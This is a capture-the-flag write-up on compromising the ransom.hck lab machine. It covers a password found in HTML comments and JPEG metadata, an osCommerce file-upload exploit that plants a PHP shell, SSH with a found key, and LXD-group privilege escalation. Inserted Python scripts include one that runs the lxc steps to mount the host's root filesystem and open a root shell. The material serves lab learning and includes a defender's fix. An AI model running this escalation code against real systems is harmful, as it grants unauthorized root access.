Summary

As always I started with an nmap port scan, which showed a few open ports, including HTTP and SSH. After some enumeration we found a way to exploit the HTTP service and gained user access to the machine. Running the LinEnum.sh script then showed that our user's group membership could be abused. I had seen a similar question before, so I thought I could capture the flag; a Google search turned up a writeup on the technique, I followed it for privilege escalation and captured the flag.

Starting with nmap scan

The scan showed several open ports. When I see HTTP open in a CTF I visit it in my browser. The website redirected me to another address, ransom.hck. My browser could not resolve it, because no such domain exists in public DNS, so I added it to my computer's hosts file manually, pointing at the target's IP.

(Image: brazil-hosts-file)

Browsing the pages/directories

When I followed the redirect in my browser it took me to ransom.hck/oscommerce. We searched for osCommerce vulnerabilities and found several, some requiring authentication and some not. We tried to exploit the osCommerce installation without any credentials, but failed.

After a while I decided to look at the HTML source of the root page of ransom.hck (I don't know why I hadn't tried it before) to check whether we had missed something. We had. Running curl -vvv http://ransom.hck showed something odd: a filename sitting in an HTML comment, which a browser never renders.

The file was named ransom.jpg, and we found it on the website right away.

(Image: brazil-ransom-jpg, the ransom.jpg file)
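The check that found ransom.jpg, as an added example written for this page (not the author's code): pull every HTML comment out of a page and list the file names they mention, so the "view source" step is not skipped again. The sample page below is constructed to stand in for the real ransom.hck response, and fetch_source() assumes the hosts entry is already in place.

```python
"""Pull HTML comments out of a page and list the file names they mention."""
from html.parser import HTMLParser
import re
import urllib.request

# File-looking tokens worth a follow-up request; extend the extension list to taste.
FILE_RE = re.compile(r"[\w./-]+\.(?:jpe?g|png|gif|txt|zip|bak|old|php|sql|tar|gz)", re.I)


class CommentCollector(HTMLParser):
    """Collects every <!-- ... --> comment; browsers never render these."""

    def __init__(self):
        super().__init__()
        self.comments = []

    def handle_comment(self, data):
        self.comments.append(data.strip())


def comments_in(html):
    """Return all comment bodies of `html` in page order."""
    parser = CommentCollector()
    parser.feed(html)
    parser.close()
    return parser.comments


def commented_files(html):
    """Return file-looking strings found inside HTML comments, de-duplicated, in page order."""
    seen, found = set(), []
    for comment in comments_in(html):
        for name in FILE_RE.findall(comment):
            if name not in seen:
                seen.add(name)
                found.append(name)
    return found


def fetch_source(url, timeout=10):
    """Fetch the raw body like `curl http://host/` would (assumes the name resolves, e.g. via /etc/hosts)."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        charset = resp.headers.get_content_charset() or "utf-8"
        return resp.read().decode(charset, "replace")


# Constructed sample standing in for the ransom.hck front page; not the real response.
SAMPLE_HTML = """<html><head><title>ransom.hck</title></head>
<body>
<!-- TODO: remove before go-live -->
<!-- <img src="/ransom.jpg"> -->
<p>Welcome</p>
<!-- backup copy: /old/site.zip -->
</body></html>"""

if __name__ == "__main__":
    import sys
    page = fetch_source(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_HTML
    for comment in comments_in(page):
        print("comment:", comment)
    for name in commented_files(page):
        print("candidate file:", name)
```

Run it with a URL argument against a live target, or with no argument to see it work on the constructed sample; every candidate it prints is worth one extra request.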

We then found a string in ransom.jpg's metadata.

(Image: brazil-ransom-jpg-meta-data)
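For the metadata step, an added example of my own (not the author's tooling, which is not named on the page): a small JPEG marker walker that dumps the printable text from the comment (COM), Exif/XMP (APP1) and IPTC (APP13) segments, which is where exiftool and strings find this kind of thing. The sample JPEG is constructed in the script, with the page's string placed in a COM segment as an illustration; the page does not say which field the real file used.

```python
"""Walk a JPEG's marker segments and dump the text carried in its metadata."""
import struct
import sys

# Markers whose payload commonly carries user-supplied text.
META_MARKERS = {0xFE: "COM", 0xE1: "APP1 (Exif/XMP)", 0xED: "APP13 (IPTC)"}


def jpeg_segments(data):
    """Yield (marker, payload) for each segment before the entropy-coded image data."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI marker")
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected 0xFF marker prefix at offset {pos}")
        marker = data[pos + 1]
        if marker == 0xFF:          # fill byte before a marker, skip it
            pos += 1
            continue
        if marker in (0xD9, 0xDA):  # EOI, or SOS: compressed scan follows, metadata is done
            return
        if marker == 0x01 or 0xD0 <= marker <= 0xD7:  # TEM / RSTn carry no length field
            pos += 2
            continue
        if pos + 4 > len(data):
            raise ValueError("truncated segment header")
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])  # length includes its own 2 bytes
        payload = data[pos + 4:pos + 2 + length]
        yield marker, payload
        pos += 2 + length


def printable_strings(blob, min_len=4):
    """Runs of printable ASCII at least `min_len` long, like the `strings` tool."""
    out, cur = [], bytearray()
    for b in blob:
        if 32 <= b < 127:
            cur.append(b)
        else:
            if len(cur) >= min_len:
                out.append(cur.decode("ascii"))
            cur = bytearray()
    if len(cur) >= min_len:
        out.append(cur.decode("ascii"))
    return out


def jpeg_metadata_strings(data):
    """Map segment name -> list of printable strings, for the metadata segments only."""
    found = {}
    for marker, payload in jpeg_segments(data):
        name = META_MARKERS.get(marker)
        if name is not None:
            found.setdefault(name, []).extend(printable_strings(payload))
    return found


def _segment(marker, payload):
    """Build one marker segment: FF <marker> <length> <payload>."""
    return b"\xff" + bytes([marker]) + struct.pack(">H", len(payload) + 2) + payload


# Constructed minimal JPEG: JFIF header, a COM segment, an empty Exif block, then SOS/EOI.
SAMPLE_JPEG = (
    b"\xff\xd8"
    + _segment(0xE0, b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00")
    + _segment(0xFE, b"12aN5oM")
    + _segment(0xE1, b"Exif\x00\x00II*\x00\x08\x00\x00\x00\x00\x00")
    + b"\xff\xda\x00\x08\x01\x01\x00\x00\x3f\x00\xff\xd9"
)

if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_JPEG
    for name, strings in jpeg_metadata_strings(data).items():
        for s in strings:
            print(f"{name}: {s}")
```

Anything the walker prints from COM or APP1 is a candidate credential for the next step; real Exif payloads are TIFF-structured, so the string scan is a shortcut rather than a parser, which is fine for a CTF.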

Continuing with osCommerce Arbitrary File Upload

The string was 12aN5oM. We tried it as an SSH credential in many username and password combinations, but that failed too. After a while we discovered the string was the admin password of the osCommerce installation.

(Image: brazil-oscommerce-admin-panel)

With admin access we went back to the osCommerce exploits. I tried an arbitrary file upload vulnerability from exploit-db.com[1] and it worked: I uploaded a PHP shell[2].

(Image: brazil-uploading-php-shell)

(Image: brazil-php-shell)

Once the PHP shell was up I wanted a reverse shell[3] back to my machine, although this step was not necessary for this question.

Enumerating files to gain SSH access

We enumerated the machine and my team said "there is an interesting file", a file called .up

(Image: brazil-rsa-private-key)

We connected to the machine over SSH with this RSA private key (we had found the username earlier in /etc/passwd). Note that ssh refuses a key file that is readable by others, so the copied key needs chmod 600 before ssh -i will use it.

I usually run the LinEnum.sh[4] script as soon as I have an SSH connection; it is one of my favourite scripts. When it finished, among its findings was: "We're a member of the (lxd) group - could possibly misuse these rights!"

(Image: brazil-linenum.sh)

Privilege escalation with LXD/LXC

I had done something like this before, but that was a Docker container question, and I thought the same approach would work here.

After some research on Google I found a writeup about a Hack The Box machine[5].

(Image: brazil-lxd-lxc-privesc-reference)

I uploaded my Linux container image to the machine and then followed roughly the same steps as that writeup; you may want to read it for this step. The idea is that a member of the lxd group can create a privileged container and mount the host's root filesystem inside it, so a shell in that container can read and write the host's files as root.

Then, with the following magic command, I got a root shell:

lxc exec mycontainer /bin/sh
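An added example, written for this page rather than taken from the author or from LinEnum: a script that reproduces the LinEnum check from the previous section against /etc/group and lays out the lxc steps behind that command. The /etc/group excerpt is constructed (the user "ransom" is a stand-in; the page does not name the real username), and the image path, alias, container name and mount point are placeholders.

```python
"""Check for lxd/docker group membership and lay out the LXD privilege escalation steps."""
import getpass
import shutil
import subprocess
import sys

# Members of these groups can drive a daemon that runs as root on the host.
ROOT_EQUIVALENT_GROUPS = ("lxd", "docker")


def root_equivalent_groups(group_file_text, user):
    """Names of root-equivalent groups that list `user`, parsed from /etc/group content."""
    hits = []
    for line in group_file_text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")          # name:password:gid:member,member
        if len(fields) < 4:
            continue
        name, members = fields[0], fields[3]
        if name in ROOT_EQUIVALENT_GROUPS and user in [m for m in members.split(",") if m]:
            hits.append(name)
    return hits


def lxd_privesc_plan(image_path, alias="myimage", container="mycontainer", mount="/mnt/root"):
    """The lxc command sequence: privileged container with the host's / mounted at `mount`."""
    return [
        ["lxc", "image", "import", image_path, "--alias", alias],
        ["lxc", "init", alias, container, "-c", "security.privileged=true"],
        ["lxc", "config", "device", "add", container, "hostroot", "disk",
         "source=/", f"path={mount}", "recursive=true"],
        ["lxc", "start", container],
        ["lxc", "exec", container, "--", "/bin/sh"],
    ]


def run_plan(plan):
    """Run each setup step, then hand over the interactive shell. Returns the first failing command or None."""
    if shutil.which("lxc") is None:
        raise RuntimeError("lxc client not found on this host")
    for cmd in plan[:-1]:
        if subprocess.run(cmd).returncode != 0:
            return cmd
    subprocess.call(plan[-1])   # root shell inside the container; returns when it exits
    return None


# Constructed /etc/group excerpt; "ransom" is a placeholder username.
SAMPLE_GROUP_FILE = """root:x:0:
sudo:x:27:ubuntu
lxd:x:130:ubuntu,ransom
docker:x:999:
"""

if __name__ == "__main__":
    user = getpass.getuser()
    with open("/etc/group") as fh:
        hits = root_equivalent_groups(fh.read(), user)
    print(f"{user} is in root-equivalent groups: {hits or 'none'}")
    if "lxd" in hits and len(sys.argv) > 1:
        failed = run_plan(lxd_privesc_plan(sys.argv[1]))
        if failed:
            print("step failed:", " ".join(failed))
```

Invoke it with the path of the uploaded image tarball to run the sequence. Two caveats from experience with this technique: if the LXD daemon has never been initialized the first lxc command fails with a storage error and `lxd init --auto` is needed first, and the image must be built on the attacking machine and copied over, since the target normally has no internet access. Inside the container the host's files are under /mnt/root. For the defender the fix is equally simple: nobody who is not already an administrator belongs in the lxd or docker group.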

After the privesc it was easy to capture the flag.

(Image: brazil-flag)

References:

  1. osCommerce 2.3.4.1 Arbitrary File Upload (exploit-db)
  2. PHP Shell (flozz, GitHub)
  3. Reverse Shell Cheat Sheet (pentestmonkey)
  4. LinEnum.sh (rebootuser, GitHub)
  5. Privilege Escalation via LXD/LXC: https://dominicbreuker.com/post/htb_calamity/